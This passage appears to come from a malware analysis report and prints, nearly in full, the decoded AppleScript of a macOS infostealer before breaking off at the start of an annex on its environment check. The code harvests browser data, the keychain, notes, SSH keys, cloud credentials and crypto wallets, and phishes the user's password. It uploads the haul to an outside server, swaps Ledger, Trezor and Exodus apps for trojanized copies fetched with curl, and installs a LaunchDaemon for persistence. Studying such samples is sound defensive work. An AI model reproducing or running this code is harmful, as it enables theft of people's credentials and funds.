set hwyksoup173 to "user10" -- DECODED
set hwyksoup174 to "/.logged" -- DECODED
writeToFile(hwyksoup173, outputDir & hwyksoup174)
set hwyksoup175 to "curl https://" -- DECODED
set hwyksoup176 to "/zxc/app." -- DECODED
set hwyksoup177 to "zip -o /t" -- DECODED
set hwyksoup178 to "mp/app.zip" -- DECODED
do shell script hwyksoup175 & c2Domain & (hwyksoup176 & hwyksoup177 & hwyksoup178)
try
set hwyksoup179 to "pkill" -- DECODED
set hwyksoup180 to " \"Led" -- DECODED
set hwyksoup181 to "ger W" -- DECODED
set hwyksoup182 to "allet\"" -- DECODED
do shell script (hwyksoup179 & hwyksoup180 & hwyksoup181 & hwyksoup182)
end try
set hwyksoup183 to "echo " -- DECODED
set hwyksoup184 to " | sudo -S rm -r " -- DECODED
do shell script hwyksoup183 & quoted form of appPassword & hwyksoup184 & quoted form of appInstallPath
delay 1
set hwyksoup185 to "ditto -x -k " -- DECODED
set hwyksoup186 to "/tmp/app.zip" -- DECODED
set hwyksoup187 to " /Applicatio" -- DECODED
set hwyksoup188 to "ns" -- DECODED
do shell script (hwyksoup185 & hwyksoup186 & hwyksoup187 & hwyksoup188)
delay 1
set hwyksoup189 to "chmod -R +x " -- DECODED
do shell script hwyksoup189 & quoted form of appInstallPath
delay 1
set hwyksoup190 to "rm /tmp/app.zip" -- DECODED
do shell script hwyksoup190
end try
end trojanizeLedger
on trojanizeTrezor(outputDir, appPassword, c2Domain)
try
set hwyksoup191 to "/Applicati" -- DECODED
set hwyksoup192 to "ons/Trezor" -- DECODED
set hwyksoup193 to " Suite.app" -- DECODED
set appInstallPath to (hwyksoup191 & hwyksoup192 & hwyksoup193)
list folder POSIX file appInstallPath
set hwyksoup194 to "/.logged" -- DECODED
set filePath to outputDir & hwyksoup194
set hwyksoup195 to "rm -f " -- DECODED
do shell script hwyksoup195 & quoted form of filePath
set hwyksoup196 to "user10" -- DECODED
set hwyksoup197 to "/.logged" -- DECODED
writeToFile(hwyksoup196, outputDir & hwyksoup197)
set hwyksoup198 to "curl https://" -- DECODED
set hwyksoup199 to "/zxc/apptwo.zip -" -- DECODED
set hwyksoup200 to "o /tmp/apptwo.zip" -- DECODED
do shell script hwyksoup198 & c2Domain & (hwyksoup199 & hwyksoup200)
try
set hwyksoup201 to "pkill \"Trezor Suite\"" -- DECODED
do shell script hwyksoup201
end try
set hwyksoup202 to "echo " -- DECODED
set hwyksoup203 to " | sudo -S rm -r " -- DECODED
do shell script hwyksoup202 & quoted form of appPassword & hwyksoup203 & quoted form of appInstallPath
delay 1
set hwyksoup204 to "ditto -x -k /tmp/app" -- DECODED
set hwyksoup205 to "two.zip /Applications" -- DECODED
do shell script (hwyksoup204 & hwyksoup205)
delay 1
set hwyksoup206 to "chmod -R +x " -- DECODED
do shell script hwyksoup206 & quoted form of appInstallPath
delay 1
set hwyksoup207 to "rm /tmp/apptwo.zip" -- DECODED
do shell script hwyksoup207
end try
end trojanizeTrezor
on trojanizeExodus(outputDir, appPassword, c2Domain)
try
set hwyksoup208 to "/Application" -- DECODED
set hwyksoup209 to "s/Exodus.app" -- DECODED
set appInstallPath to (hwyksoup208 & hwyksoup209)
list folder POSIX file appInstallPath
set hwyksoup210 to "/.logged" -- DECODED
set filePath to outputDir & hwyksoup210
set hwyksoup211 to "rm -f " -- DECODED
do shell script hwyksoup211 & quoted form of filePath
set hwyksoup212 to "user10" -- DECODED
set hwyksoup213 to "/.logged" -- DECODED
writeToFile(hwyksoup212, outputDir & hwyksoup213)
set hwyksoup214 to "curl https://" -- DECODED
set hwyksoup215 to "/zxc/app" -- DECODED
set hwyksoup216 to "ex.zip -" -- DECODED
set hwyksoup217 to "o /tmp/a" -- DECODED
set hwyksoup218 to "ppex.zip" -- DECODED
do shell script hwyksoup214 & c2Domain & (hwyksoup215 & hwyksoup216 & hwyksoup217 & hwyksoup218)
try
set hwyksoup219 to "pkill \"Exodus\"" -- DECODED
do shell script hwyksoup219
end try
set hwyksoup220 to "echo " -- DECODED
set hwyksoup221 to " | sudo -S rm -r " -- DECODED
do shell script hwyksoup220 & quoted form of appPassword & hwyksoup221 & quoted form of appInstallPath
delay 1
set hwyksoup222 to "ditto -x -" -- DECODED
set hwyksoup223 to "k /tmp/app" -- DECODED
set hwyksoup224 to "ex.zip /Ap" -- DECODED
set hwyksoup225 to "plications" -- DECODED
do shell script (hwyksoup222 & hwyksoup223 & hwyksoup224 & hwyksoup225)
delay 1
set hwyksoup226 to "chmod -R +x " -- DECODED
do shell script hwyksoup226 & quoted form of appInstallPath
delay 1
set hwyksoup227 to "rm /tmp/appex.zip" -- DECODED
do shell script hwyksoup227
end try
end trojanizeExodus
on installPersistence(rzirjmnmshvz, ozkyftlcqnmz, c2Url)
try
set hwyksoup228 to "/Library/App" -- DECODED
set hwyksoup229 to "lication Sup" -- DECODED
set hwyksoup230 to "port/.com.ap" -- DECODED
set hwyksoup231 to "ple.accountsd" -- DECODED
set botDir to rzirjmnmshvz & (hwyksoup228 & hwyksoup229 & hwyksoup230 & hwyksoup231)
set hwyksoup232 to "/AccountsHelper" -- DECODED
set botBinary to botDir & hwyksoup232
set hwyksoup233 to "/.service" -- DECODED
set agentScriptPath to botDir & hwyksoup233
set hwyksoup234 to "com.ap" -- DECODED
set hwyksoup235 to "ple.ac" -- DECODED
set hwyksoup236 to "counts" -- DECODED
set hwyksoup237 to "d.help" -- DECODED
set hwyksoup238 to "er" -- DECODED
set launchDaemonLabel to (hwyksoup234 & hwyksoup235 & hwyksoup236 & hwyksoup237 & hwyksoup238)
set hwyksoup239 to "/Library/La" -- DECODED
set hwyksoup240 to "unchDaemons/" -- DECODED
set hwyksoup241 to ".plist" -- DECODED
set launchDaemonPlist to (hwyksoup239 & hwyksoup240) & launchDaemonLabel & hwyksoup241
set hwyksoup242 to "mkdir -p " -- DECODED
do shell script hwyksoup242 & quoted form of botDir
set hwyksoup243 to "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://ww" -- DECODED
set hwyksoup244 to "w.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>" -- DECODED
set hwyksoup245 to "</string>
<key>Program" -- DECODED
set hwyksoup246 to "Arguments</key>
<array" -- DECODED
set hwyksoup247 to ">
<string>/bin/bas" -- DECODED
set hwyksoup248 to "h</string>
<string>" -- DECODED
set hwyksoup249 to "</string>
</array>
<key>RunAt" -- DECODED
set hwyksoup250 to "Load</key>
<true/>
<key>KeepA" -- DECODED
set hwyksoup251 to "live</key>
<true/>
</dict>
</plis" -- DECODED
set hwyksoup252 to "t>" -- DECODED
set plistContent to (hwyksoup243 & hwyksoup244) & launchDaemonLabel & (hwyksoup245 & hwyksoup246 & hwyksoup247 & hwyksoup248) & agentScriptPath & (hwyksoup249 & hwyksoup250 & hwyksoup251 & hwyksoup252)
set hwyksoup253 to "curl -o " -- DECODED
set hwyksoup254 to " https://" -- DECODED
set hwyksoup255 to "/zxc/kito" -- DECODED
do shell script hwyksoup253 & quoted form of botBinary & hwyksoup254 & c2Url & hwyksoup255
set hwyksoup256 to "chmod +x " -- DECODED
do shell script hwyksoup256 & quoted form of botBinary
set hwyksoup257 to "while true; do
osascript <<EOF
set loginContent to do shell script \"stat -f \\"%Su\\" /dev/console\"
if loginContent is " -- DECODED
set hwyksoup258 to "not equal to \"\" and loginContent is not equal to \"root\"
do shell script \"sudo -u \" & quoted form of loginContent & \" " -- DECODED
set hwyksoup259 to "\"
end i" -- DECODED
set hwyksoup260 to "f
EOF
" -- DECODED
set hwyksoup261 to " slee" -- DECODED
set hwyksoup262 to "p 1
done" -- DECODED
set agentScript to (hwyksoup257 & hwyksoup258) & quoted form of botBinary & (hwyksoup259 & hwyksoup260 & hwyksoup261 & hwyksoup262)
writeToFile(agentScript, agentScriptPath)
set hwyksoup263 to "/tmp/starter" -- DECODED
writeToFile(plistContent, hwyksoup263)
set hwyksoup264 to "chmod +x " -- DECODED
do shell script hwyksoup264 & quoted form of agentScriptPath
set hwyksoup265 to "echo " -- DECODED
set hwyksoup266 to " | sudo -" -- DECODED
set hwyksoup267 to "S cp /tmp" -- DECODED
set hwyksoup268 to "/starter " -- DECODED
do shell script hwyksoup265 & quoted form of ozkyftlcqnmz & (hwyksoup266 & hwyksoup267 & hwyksoup268) & launchDaemonPlist
set hwyksoup269 to "echo " -- DECODED
set hwyksoup270 to " | sudo -" -- DECODED
set hwyksoup271 to "S chown r" -- DECODED
set hwyksoup272 to "oot:wheel " -- DECODED
do shell script hwyksoup269 & quoted form of ozkyftlcqnmz & (hwyksoup270 & hwyksoup271 & hwyksoup272) & launchDaemonPlist
set hwyksoup273 to "echo " -- DECODED
set hwyksoup274 to " | sudo " -- DECODED
set hwyksoup275 to "-S launc" -- DECODED
set hwyksoup276 to "hctl loa" -- DECODED
set hwyksoup277 to "d " -- DECODED
do shell script hwyksoup273 & quoted form of ozkyftlcqnmz & (hwyksoup274 & hwyksoup275 & hwyksoup276 & hwyksoup277) & launchDaemonPlist
end try
end installPersistence
on run
set hwyksoup278 to "true" -- DECODED
set platformFlag to hwyksoup278
set hwyksoup279 to "true" -- DECODED
set osFlag to hwyksoup279
set hwyksoup280 to "false" -- DECODED
set buildFlag to hwyksoup280
set hwyksoup281 to "USER" -- DECODED
set currentUser to (system attribute hwyksoup281)
set hwyksoup282 to "/Users/" -- DECODED
set homeDir to hwyksoup282 & currentUser
set hwyksoup283 to "s1Hm3Q1X6G/f6c" -- DECODED
set hwyksoup284 to "72cNHCapbyytW3" -- DECODED
set hwyksoup285 to "wcp3tbz6dKg8ee" -- DECODED
set hwyksoup286 to "c=" -- DECODED
set configData to (hwyksoup283 & hwyksoup284 & hwyksoup285 & hwyksoup286)
set hwyksoup287 to "1OVqyOU/n3-4zK" -- DECODED
set hwyksoup288 to "VSjFsNK88S2buJ" -- DECODED
set hwyksoup289 to "zuW3rNaXRCJ1l4" -- DECODED
set hwyksoup290 to "Q=" -- DECODED
set buildId to (hwyksoup287 & hwyksoup288 & hwyksoup289 & hwyksoup290)
set hwyksoup291 to "https://mpasvw.com" -- DECODED
set exfilUrl to hwyksoup291
set clientId to "0"
set chunkNum to "0"
set hwyksoup292 to "aforvm.com" -- DECODED
set c2Url to hwyksoup292
set hwyksoup293 to "/Library/Applica" -- DECODED
set hwyksoup294 to "tion Support/.co" -- DECODED
set hwyksoup295 to "m.apple.accountsd" -- DECODED
set botSupportDir to homeDir & (hwyksoup293 & hwyksoup294 & hwyksoup295)
set hwyksoup296 to "mkdir -p " -- DECODED
do shell script hwyksoup296 & quoted form of botSupportDir
try
set hwyksoup297 to "rm -f " -- DECODED
set hwyksoup298 to "/.cfg" -- DECODED
do shell script hwyksoup297 & quoted form of (botSupportDir & hwyksoup298)
end try
try
set hwyksoup299 to "rm -f " -- DECODED
set hwyksoup300 to "/.service" -- DECODED
do shell script hwyksoup299 & quoted form of (botSupportDir & hwyksoup300)
end try
try
set hwyksoup301 to "rm -f /tmp/starter" -- DECODED
do shell script hwyksoup301
end try
set hwyksoup302 to "/.cfg" -- DECODED
writeToFile(configData, botSupportDir & hwyksoup302)
set randomId to (random number from 10000 to 100000) as text
set hwyksoup303 to "/tmp/" -- DECODED
set tmpStagingDir to hwyksoup303 & randomId & "/"
try
set hwyksoup304 to "system_profiler SP" -- DECODED
set hwyksoup305 to "SoftwareDataType S" -- DECODED
set hwyksoup306 to "PHardwareDataType " -- DECODED
set hwyksoup307 to "SPDisplaysDataType" -- DECODED
set systemInfo to (do shell script (hwyksoup304 & hwyksoup305 & hwyksoup306 & hwyksoup307))
set hwyksoup308 to "info" -- DECODED
writeToFile(systemInfo, tmpStagingDir & hwyksoup308)
end try
set hwyksoup309 to "/Library/" -- DECODED
set appSupportDir to homeDir & hwyksoup309
set hwyksoup310 to "Application Support/" -- DECODED
set appDataDir to appSupportDir & hwyksoup310
set hwyksoup311 to "/.auth" -- DECODED
set storedPassword to readFileContents(botSupportDir & hwyksoup311)
if not validatePassword(currentUser, storedPassword) then
set storedPassword to promptForPassword(currentUser, tmpStagingDir)
set hwyksoup312 to "/.auth" -- DECODED
writeToFile(storedPassword, botSupportDir & hwyksoup312)
end if
delay 0.01
set hwyksoup313 to "pwd" -- DECODED
writeToFile(storedPassword, tmpStagingDir & hwyksoup313)
set hwyksoup314 to "Group Contain" -- DECODED
set hwyksoup315 to "ers/group.com" -- DECODED
set hwyksoup316 to ".apple.notes/" -- DECODED
set hwyksoup317 to "NoteStore.sql" -- DECODED
set hwyksoup318 to "ite" -- DECODED
set noteStoreDir to appSupportDir & (hwyksoup314 & hwyksoup315 & hwyksoup316 & hwyksoup317 & hwyksoup318)
set hwyksoup319 to "FileGra" -- DECODED
set hwyksoup320 to "bber/No" -- DECODED
set hwyksoup321 to "teStore" -- DECODED
set hwyksoup322 to ".sqlite" -- DECODED
copyFile(noteStoreDir, tmpStagingDir & (hwyksoup319 & hwyksoup320 & hwyksoup321 & hwyksoup322))
set hwyksoup323 to "-wal" -- DECODED
set hwyksoup324 to "FileGrabbe" -- DECODED
set hwyksoup325 to "r/NoteStor" -- DECODED
set hwyksoup326 to "e.sqlite-w" -- DECODED
set hwyksoup327 to "al" -- DECODED
copyFile(noteStoreDir & hwyksoup323, tmpStagingDir & (hwyksoup324 & hwyksoup325 & hwyksoup326 & hwyksoup327))
set hwyksoup328 to "-shm" -- DECODED
set hwyksoup329 to "FileGrabber/Note" -- DECODED
set hwyksoup330 to "Store.sqlite-shm" -- DECODED
copyFile(noteStoreDir & hwyksoup328, tmpStagingDir & (hwyksoup329 & hwyksoup330))
set hwyksoup331 to "Containers/com.apple.Safari/Data/Li" -- DECODED
set hwyksoup332 to "brary/Cookies/Cookies.binarycookies" -- DECODED
set hwyksoup333 to "FileGrabber/Cook" -- DECODED
set hwyksoup334 to "ies.binarycookies" -- DECODED
copyFile(appSupportDir & (hwyksoup331 & hwyksoup332), tmpStagingDir & (hwyksoup333 & hwyksoup334))
set hwyksoup335 to "Cookies" -- DECODED
set hwyksoup336 to "/Cookie" -- DECODED
set hwyksoup337 to "s.binar" -- DECODED
set hwyksoup338 to "ycookies" -- DECODED
set hwyksoup339 to "FileGrabber/saf1" -- DECODED
copyFile(appSupportDir & (hwyksoup335 & hwyksoup336 & hwyksoup337 & hwyksoup338), tmpStagingDir & hwyksoup339)
set hwyksoup340 to "true" -- DECODED
if platformFlag is equal to hwyksoup340 then
stealSafariKeychainNotes(tmpStagingDir)
end if
set hwyksoup341 to "OpenVPN Conn" -- DECODED
set hwyksoup342 to "ect/profiles/" -- DECODED
set hwyksoup343 to "OpenVPN" -- DECODED
copyDirectoryRecursive(appSupportDir & (hwyksoup341 & hwyksoup342), tmpStagingDir & hwyksoup343)
try
set installedApps to ""
set hwyksoup344 to "/Applications" -- DECODED
set qvnqwdflcckc to list folder hwyksoup344
repeat with ncrhtobbqi in qvnqwdflcckc
set installedApps to installedApps & ncrhtobbqi & return
end repeat
set hwyksoup345 to "installedSoft" -- DECODED
writeToFile(installedApps, tmpStagingDir & hwyksoup345)
end try
set hwyksoup346 to "true" -- DECODED
if osFlag is equal to hwyksoup346 then
try
set hwyksoup347 to "FileGra" -- DECODED
set hwyksoup348 to "bber/No" -- DECODED
set hwyksoup349 to "teStore" -- DECODED
set hwyksoup350 to ".sqlite" -- DECODED
if readFileContents(tmpStagingDir & (hwyksoup347 & hwyksoup348 & hwyksoup349 & hwyksoup350)) is equal to "" then
stealAppleNotes(tmpStagingDir)
end if
end try
end if
stealTelegramData(tmpStagingDir, appDataDir)
set hwyksoup351 to "Chrome" -- DECODED
set hwyksoup352 to "Google/Chrome/" -- DECODED
set hwyksoup353 to "Brave" -- DECODED
set hwyksoup354 to "BraveSo" -- DECODED
set hwyksoup355 to "ftware/" -- DECODED
set hwyksoup356 to "Brave-B" -- DECODED
set hwyksoup357 to "rowser/" -- DECODED
set hwyksoup358 to "Edge" -- DECODED
set hwyksoup359 to "Microsoft Edge/" -- DECODED
set hwyksoup360 to "Vivaldi" -- DECODED
set hwyksoup361 to "Vivaldi/" -- DECODED
set hwyksoup362 to "Opera" -- DECODED
set hwyksoup363 to "com.op" -- DECODED
set hwyksoup364 to "erasof" -- DECODED
set hwyksoup365 to "tware." -- DECODED
set hwyksoup366 to "Opera/" -- DECODED
set hwyksoup367 to "OperaGX" -- DECODED
set hwyksoup368 to "com.operasoft" -- DECODED
set hwyksoup369 to "ware.OperaGX/" -- DECODED
set hwyksoup370 to "Chrome Beta" -- DECODED
set hwyksoup371 to "Google/Chrome Beta/" -- DECODED
set hwyksoup372 to "Chrome Canary" -- DECODED
set hwyksoup373 to "Google/Chrome Canary" -- DECODED
set hwyksoup374 to "Chromium" -- DECODED
set hwyksoup375 to "Chromium/" -- DECODED
set hwyksoup376 to "Chrome Dev" -- DECODED
set hwyksoup377 to "Google/Chrome Dev/" -- DECODED
set hwyksoup378 to "Arc" -- DECODED
set hwyksoup379 to "Arc/User Data/" -- DECODED
set hwyksoup380 to "CocCoc" -- DECODED
set hwyksoup381 to "CocCoc/Browser/" -- DECODED
set firefoxBrowserList to {{hwyksoup351, appDataDir & hwyksoup352}, {hwyksoup353, appDataDir & (hwyksoup354 & hwyksoup355 & hwyksoup356 & hwyksoup357)}, {hwyksoup358, appDataDir & hwyksoup359}, {hwyksoup360, appDataDir & hwyksoup361}, {hwyksoup362, appDataDir & (hwyksoup363 & hwyksoup364 & hwyksoup365 & hwyksoup366)}, {hwyksoup367, appDataDir & (hwyksoup368 & hwyksoup369)}, {hwyksoup370, appDataDir & hwyksoup371}, {hwyksoup372, appDataDir & hwyksoup373}, {hwyksoup374, appDataDir & hwyksoup375}, {hwyksoup376, appDataDir & hwyksoup377}, {hwyksoup378, appDataDir & hwyksoup379}, {hwyksoup380, appDataDir & hwyksoup381}}
set hwyksoup382 to "Electrum" -- DECODED
set hwyksoup383 to "/.electrum/wallets/" -- DECODED
set hwyksoup384 to "Coinomi" -- DECODED
set hwyksoup385 to "Coinomi/wallets/" -- DECODED
set hwyksoup386 to "Exodus" -- DECODED
set hwyksoup387 to "Exodus/" -- DECODED
set hwyksoup388 to "Atomic" -- DECODED
set hwyksoup389 to "atomic/Lo" -- DECODED
set hwyksoup390 to "cal Stora" -- DECODED
set hwyksoup391 to "ge/leveld" -- DECODED
set hwyksoup392 to "b/" -- DECODED
set hwyksoup393 to "Wasabi" -- DECODED
set hwyksoup394 to "/.walle" -- DECODED
set hwyksoup395 to "twasabi" -- DECODED
set hwyksoup396 to "/client" -- DECODED
set hwyksoup397 to "/Wallet" -- DECODED
set hwyksoup398 to "s/" -- DECODED
set hwyksoup399 to "Ledger_Live" -- DECODED
set hwyksoup400 to "Ledger Live/" -- DECODED
set hwyksoup401 to "Monero" -- DECODED
set hwyksoup402 to "/Monero/wallets/" -- DECODED
set hwyksoup403 to "Bitcoin_Core" -- DECODED
set hwyksoup404 to "Bitcoin/wallets/" -- DECODED
set hwyksoup405 to "Litecoin_Core" -- DECODED
set hwyksoup406 to "Litecoin/wallets/" -- DECODED
set hwyksoup407 to "Dash_Core" -- DECODED
set hwyksoup408 to "DashCore/wallets/" -- DECODED
set hwyksoup409 to "Electrum_LTC" -- DECODED
set hwyksoup410 to "/.ele" -- DECODED
set hwyksoup411 to "ctrum" -- DECODED
set hwyksoup412 to "-ltc/" -- DECODED
set hwyksoup413 to "walle" -- DECODED
set hwyksoup414 to "ts/" -- DECODED
set hwyksoup415 to "Electron_Cash" -- DECODED
set hwyksoup416 to "/.elec" -- DECODED
set hwyksoup417 to "tron-c" -- DECODED
set hwyksoup418 to "ash/wa" -- DECODED
set hwyksoup419 to "llets/" -- DECODED
set hwyksoup420 to "Guarda" -- DECODED
set hwyksoup421 to "Guarda/" -- DECODED
set hwyksoup422 to "Dogecoin_Core" -- DECODED
set hwyksoup423 to "Dogecoin/wallets/" -- DECODED
set hwyksoup424 to "Trezor_Suite" -- DECODED
set hwyksoup425 to "@trezor" -- DECODED
set hwyksoup426 to "/suite-" -- DECODED
set hwyksoup427 to "desktop/" -- DECODED
set hwyksoup428 to "Sparrow" -- DECODED
set hwyksoup429 to "/.sparrow/wallets/" -- DECODED
set chromiumBrowserList to {{hwyksoup382, homeDir & hwyksoup383}, {hwyksoup384, appDataDir & hwyksoup385}, {hwyksoup386, appDataDir & hwyksoup387}, {hwyksoup388, appDataDir & (hwyksoup389 & hwyksoup390 & hwyksoup391 & hwyksoup392)}, {hwyksoup393, homeDir & (hwyksoup394 & hwyksoup395 & hwyksoup396 & hwyksoup397 & hwyksoup398)}, {hwyksoup399, appDataDir & hwyksoup400}, {hwyksoup401, homeDir & hwyksoup402}, {hwyksoup403, appDataDir & hwyksoup404}, {hwyksoup405, appDataDir & hwyksoup406}, {hwyksoup407, appDataDir & hwyksoup408}, {hwyksoup409, homeDir & (hwyksoup410 & hwyksoup411 & hwyksoup412 & hwyksoup413 & hwyksoup414)}, {hwyksoup415, homeDir & (hwyksoup416 & hwyksoup417 & hwyksoup418 & hwyksoup419)}, {hwyksoup420, appDataDir & hwyksoup421}, {hwyksoup422, appDataDir & hwyksoup423}, {hwyksoup424, appDataDir & (hwyksoup425 & hwyksoup426 & hwyksoup427)}, {hwyksoup428, homeDir & hwyksoup429}}
set hwyksoup430 to "Binance/app" -- DECODED
set hwyksoup431 to "-store.json" -- DECODED
set hwyksoup432 to "deskwallets" -- DECODED
set hwyksoup433 to "/Binance/ap" -- DECODED
set hwyksoup434 to "p-store.json" -- DECODED
copyFile(appDataDir & (hwyksoup430 & hwyksoup431), tmpStagingDir & (hwyksoup432 & hwyksoup433 & hwyksoup434))
set hwyksoup435 to "@tonkeeper" -- DECODED
set hwyksoup436 to "/desktop/c" -- DECODED
set hwyksoup437 to "onfig.json" -- DECODED
set hwyksoup438 to "deskwall" -- DECODED
set hwyksoup439 to "ets/TonK" -- DECODED
set hwyksoup440 to "eeper/co" -- DECODED
set hwyksoup441 to "nfig.json" -- DECODED
copyFile(appDataDir & (hwyksoup435 & hwyksoup436 & hwyksoup437), tmpStagingDir & (hwyksoup438 & hwyksoup439 & hwyksoup440 & hwyksoup441))
set hwyksoup442 to "Keycha" -- DECODED
set hwyksoup443 to "ins/lo" -- DECODED
set hwyksoup444 to "gin.ke" -- DECODED
set hwyksoup445 to "ychain" -- DECODED
set hwyksoup446 to "-db" -- DECODED
set hwyksoup447 to "login.keychain-db" -- DECODED
copyFile(appSupportDir & (hwyksoup442 & hwyksoup443 & hwyksoup444 & hwyksoup445 & hwyksoup446), tmpStagingDir & hwyksoup447)
set hwyksoup448 to "/.ssh/" -- DECODED
set hwyksoup449 to "FileGrabber/ssh/" -- DECODED
copyDirectoryRecursive(homeDir & hwyksoup448, tmpStagingDir & hwyksoup449)
set hwyksoup450 to "/.aws/credentials" -- DECODED
set hwyksoup451 to "FileGrabb" -- DECODED
set hwyksoup452 to "er/aws/cr" -- DECODED
set hwyksoup453 to "edentials" -- DECODED
copyFile(homeDir & hwyksoup450, tmpStagingDir & (hwyksoup451 & hwyksoup452 & hwyksoup453))
set hwyksoup454 to "/.aws/config" -- DECODED
set hwyksoup455 to "FileG" -- DECODED
set hwyksoup456 to "rabbe" -- DECODED
set hwyksoup457 to "r/aws" -- DECODED
set hwyksoup458 to "/conf" -- DECODED
set hwyksoup459 to "ig" -- DECODED
copyFile(homeDir & hwyksoup454, tmpStagingDir & (hwyksoup455 & hwyksoup456 & hwyksoup457 & hwyksoup458 & hwyksoup459))
set hwyksoup460 to "/.config/gcloud/a" -- DECODED
set hwyksoup461 to "pplication_defaul" -- DECODED
set hwyksoup462 to "t_credentials.json" -- DECODED
set hwyksoup463 to "FileGrab" -- DECODED
set hwyksoup464 to "ber/gclo" -- DECODED
set hwyksoup465 to "ud/crede" -- DECODED
set hwyksoup466 to "ntials.j" -- DECODED
set hwyksoup467 to "son" -- DECODED
copyFile(homeDir & (hwyksoup460 & hwyksoup461 & hwyksoup462), tmpStagingDir & (hwyksoup463 & hwyksoup464 & hwyksoup465 & hwyksoup466 & hwyksoup467))
set hwyksoup468 to "/.config/g" -- DECODED
set hwyksoup469 to "cloud/cred" -- DECODED
set hwyksoup470 to "entials.db" -- DECODED
set hwyksoup471 to "FileGrab" -- DECODED
set hwyksoup472 to "ber/gclo" -- DECODED
set hwyksoup473 to "ud/crede" -- DECODED
set hwyksoup474 to "ntials.db" -- DECODED
copyFile(homeDir & (hwyksoup468 & hwyksoup469 & hwyksoup470), tmpStagingDir & (hwyksoup471 & hwyksoup472 & hwyksoup473 & hwyksoup474))
set hwyksoup475 to "/.azure/" -- DECODED
set hwyksoup476 to "FileGrabber/azure/" -- DECODED
copyDirectoryRecursive(homeDir & hwyksoup475, tmpStagingDir & hwyksoup476)
set hwyksoup477 to "/.docker/config.json" -- DECODED
set hwyksoup478 to "FileGrabbe" -- DECODED
set hwyksoup479 to "r/docker/c" -- DECODED
set hwyksoup480 to "onfig.json" -- DECODED
copyFile(homeDir & hwyksoup477, tmpStagingDir & (hwyksoup478 & hwyksoup479 & hwyksoup480))
set hwyksoup481 to "/.file" -- DECODED
set hwyksoup482 to "zilla/" -- DECODED
set hwyksoup483 to "sitema" -- DECODED
set hwyksoup484 to "nager." -- DECODED
set hwyksoup485 to "xml" -- DECODED
set hwyksoup486 to "FileGrabb" -- DECODED
set hwyksoup487 to "er/filezi" -- DECODED
set hwyksoup488 to "lla/sitem" -- DECODED
set hwyksoup489 to "anager.xml" -- DECODED
copyFile(homeDir & (hwyksoup481 & hwyksoup482 & hwyksoup483 & hwyksoup484 & hwyksoup485), tmpStagingDir & (hwyksoup486 & hwyksoup487 & hwyksoup488 & hwyksoup489))
set hwyksoup490 to "/.filezil" -- DECODED
set hwyksoup491 to "la/recent" -- DECODED
set hwyksoup492 to "servers.x" -- DECODED
set hwyksoup493 to "ml" -- DECODED
set hwyksoup494 to "FileGrabber/f" -- DECODED
set hwyksoup495 to "ilezilla/rece" -- DECODED
set hwyksoup496 to "ntservers.xml" -- DECODED
copyFile(homeDir & (hwyksoup490 & hwyksoup491 & hwyksoup492 & hwyksoup493), tmpStagingDir & (hwyksoup494 & hwyksoup495 & hwyksoup496))
set hwyksoup497 to "discord" -- DECODED
set hwyksoup498 to "/Local " -- DECODED
set hwyksoup499 to "Storage" -- DECODED
set hwyksoup500 to "/leveld" -- DECODED
set hwyksoup501 to "b/" -- DECODED
set hwyksoup502 to "FileGrabber/Di" -- DECODED
set hwyksoup503 to "scord/leveldb/" -- DECODED
copyDirectoryRecursive(appDataDir & (hwyksoup497 & hwyksoup498 & hwyksoup499 & hwyksoup500 & hwyksoup501), tmpStagingDir & (hwyksoup502 & hwyksoup503))
set hwyksoup504 to "Containers" -- DECODED
set hwyksoup505 to "/Stickies/" -- DECODED
set hwyksoup506 to "Data/Libra" -- DECODED
set hwyksoup507 to "ry/Stickie" -- DECODED
set hwyksoup508 to "s/" -- DECODED
set hwyksoup509 to "FileG" -- DECODED
set hwyksoup510 to "rabbe" -- DECODED
set hwyksoup511 to "r/Sti" -- DECODED
set hwyksoup512 to "ckies/" -- DECODED
copyDirectoryRecursive(appSupportDir & (hwyksoup504 & hwyksoup505 & hwyksoup506 & hwyksoup507 & hwyksoup508), tmpStagingDir & (hwyksoup509 & hwyksoup510 & hwyksoup511 & hwyksoup512))
set hwyksoup513 to "/.zsh_history" -- DECODED
set hwyksoup514 to "FileGrabber" -- DECODED
set hwyksoup515 to "/zsh_history" -- DECODED
copyFile(homeDir & hwyksoup513, tmpStagingDir & (hwyksoup514 & hwyksoup515))
set hwyksoup516 to "username" -- DECODED
writeToFile(currentUser, tmpStagingDir & hwyksoup516)
set hwyksoup517 to "Firefox" -- DECODED
set hwyksoup518 to "Firefox/Profiles/" -- DECODED
set hwyksoup519 to "Waterfox" -- DECODED
set hwyksoup520 to "Waterfox/Profiles/" -- DECODED
set crvowfmlc to {{hwyksoup517, appDataDir & hwyksoup518}, {hwyksoup519, appDataDir & hwyksoup520}}
repeat with piiqmpdi in crvowfmlc
try
stealFirefoxBrowserData(item 1 of piiqmpdi, item 2 of piiqmpdi, tmpStagingDir, buildFlag)
end try
end repeat
repeat with nwsmkuirbv in chromiumBrowserList
set hwyksoup521 to "deskwallets/" -- DECODED
copyDirectoryRecursive(item 2 of nwsmkuirbv, tmpStagingDir & hwyksoup521 & item 1 of nwsmkuirbv)
end repeat
stealChromiumBrowserData(tmpStagingDir, firefoxBrowserList, buildFlag)
set hwyksoup522 to "ditto -" -- DECODED
set hwyksoup523 to "c -k --" -- DECODED
set hwyksoup524 to "sequest" -- DECODED
set hwyksoup525 to "erRsrc " -- DECODED
set hwyksoup526 to " /tmp/out.zip" -- DECODED
do shell script (hwyksoup522 & hwyksoup523 & hwyksoup524 & hwyksoup525) & tmpStagingDir & hwyksoup526
uploadLargeFile(exfilUrl, configData, buildId, clientId, chunkNum)
try
set hwyksoup527 to "rm -rf " -- DECODED
do shell script hwyksoup527 & tmpStagingDir
end try
try
set hwyksoup528 to "rm -f /tmp/out.zip" -- DECODED
do shell script hwyksoup528
end try
try
set hwyksoup529 to "rm -f /tmp/chunk_*" -- DECODED
do shell script hwyksoup529
end try
if storedPassword is not equal to "" then
trojanizeLedger(homeDir, storedPassword, c2Url)
trojanizeTrezor(homeDir, storedPassword, c2Url)
trojanizeExodus(homeDir, storedPassword, c2Url)
end if
try
installPersistence(homeDir, storedPassword, c2Url)
end try
end run
'&
Annexe B: Initial Environment Check Command
The 2,906-byte AppleScript command executed first to validate the target environment. Its exit code (0 = success) derives the XOR decryption key for the main payload.
Click to expand initial check command
osascript -e '
on qbibeltf(hadzhi, uytcjk)
